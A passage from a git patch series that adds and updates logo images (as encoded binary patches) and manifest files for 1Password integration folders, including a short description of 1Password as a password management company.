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

literal 0
HcmV?d00001

diff --git a/1Password/_meta/manifest.yml b/1Password/_meta/manifest.yml
new file mode 100644
index 000000000..7a2995595
--- /dev/null
+++ b/1Password/_meta/manifest.yml
@@ -0,0 +1,5 @@
+uuid: c938db6f-be6c-425c-8ea2-eab1ff63bc83
+name: 1Password
+slug: "1password"
+description: >-
+  1Password is a password management company that provides secure solutions for storing and managing passwords and sensitive information. Its services are designed for both individuals and teams to ensure online security and simplify credential management.

From 932d92cdc0497dc18a0b15d027437e87074b7e96 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Tue, 17 Sep 2024 12:08:17 +0300
Subject: [PATCH 041/317] Fixes and improvements

---
 1Password/1password-epm/_meta/logo.png     | Bin 11824 -> 28013 bytes
 1Password/1password-epm/_meta/manifest.yml |   2 +-
 1Password/_meta/logo.png                   | Bin 11824 -> 28013 bytes
 1Password/_meta/manifest.yml               |   2 +-
 4 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/1Password/1password-epm/_meta/logo.png b/1Password/1password-epm/_meta/logo.png
index d8fbd396e5dd798f4530be439b902acae10c5f19..893464ee20a2839903579d283f002b6df4858434 100644
GIT binary patch
literal 28013
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
